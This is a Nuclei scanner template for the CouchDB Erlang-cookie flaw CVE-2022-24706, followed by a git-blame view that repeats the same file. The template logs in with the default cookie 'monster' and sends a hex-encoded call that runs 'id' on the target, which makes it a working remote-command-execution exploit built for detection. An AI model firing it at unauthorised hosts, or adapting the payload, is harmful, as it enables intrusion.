nuclei-templates/network/cves/2022/CVE-2022-24706.yaml

id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
    epss-score: 0.97407
  metadata:
    max-request: 1
    product: couchdb
    shodan-query: product:"CouchDB"
    vendor: apache
    verified: "true"
  tags: cve,cve2022,network,couch,rce,kev
variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
  - host:
      - "{{Hostname}}"
    port: 9100

    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
minor -update 2023-04-24 20:49:06 +00:00			`id: CVE-2022-24706`
adding template 2023-04-16 16:32:56 +00:00
			`info:`
minor -update 2023-04-24 20:49:06 +00:00			`name: CouchDB Erlang Distribution - Remote Command Execution`
			`author: Mzack9999,pussycat0x`
adding template 2023-04-16 16:32:56 +00:00			`severity: critical`
minor -update 2023-04-24 20:49:06 +00:00			`description: \|`
			`In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.`
			`reference:`
			`- https://www.exploit-db.com/exploits/50914`
minor enhancement 2023-06-06 06:42:39 +00:00			`- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-24706`
network template enrichment 2023-07-16 13:29:08 +00:00			`- http://www.openwall.com/lists/oss-security/2022/04/26/1`
			`- http://www.openwall.com/lists/oss-security/2022/05/09/1`
TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] :robot: 2023-09-27 13:29:58 +00:00			`remediation: \|`
			`Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.`
Updated EPSS Score to CVE Templates Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-07-10 00:25:11 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-24706`
			`cwe-id: CWE-1188`
network template enrichment 2023-07-16 13:29:08 +00:00			`cpe: cpe:2.3:a:apache:couchdb::::::::`
TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] :robot: 2023-09-27 13:29:58 +00:00			`epss-score: 0.97407`
minor -update 2023-04-24 20:49:06 +00:00			`metadata:`
TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] :robot: 2023-09-27 13:29:58 +00:00			`max-request: 1`
network template enrichment 2023-07-16 13:29:08 +00:00			`product: couchdb`
Updated network CVEs 2023-09-06 13:28:19 +00:00			`shodan-query: product:"CouchDB"`
TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] :robot: 2023-09-27 13:29:58 +00:00			`vendor: apache`
			`verified: "true"`
network template enrichment 2023-07-16 13:29:08 +00:00			`tags: cve,cve2022,network,couch,rce,kev`
adding template 2023-04-16 16:32:56 +00:00			`variables:`
data - update 2023-06-06 07:07:03 +00:00			`name_msg: "00156e00050007499c4141414141414041414141414141"`
adding template 2023-04-16 16:32:56 +00:00			`challenge_reply: "00157201020304"`
			`cookie: "monster"`
			`cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"`
Update CVE-2022-24706.yaml 2023-06-06 07:17:45 +00:00			`tcp:`
network template enrichment 2023-07-16 13:29:08 +00:00			`- host:`
			`- "{{Hostname}}"`
removed duplicate network request 2023-09-16 19:35:21 +00:00			`port: 9100`

network template enrichment 2023-07-16 13:29:08 +00:00			`inputs:`
adding template 2023-04-16 16:32:56 +00:00			`# auth`
			`- data: "{{name_msg}}"`
			`type: hex`
			`read: 1024`
			`- read: 1024`
			`name: challenge`
			`- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"`
			`type: hex`
			`# rce`
			`- data: "{{cmd}}"`
			`type: hex`
			`read: 1024`
			`matchers:`
			`- type: word`
			`part: raw`
			`words:`
			`- "uid"`
			`- "gid"`
			`- "groups"`
minor -update 2023-04-24 20:49:06 +00:00			`condition: and`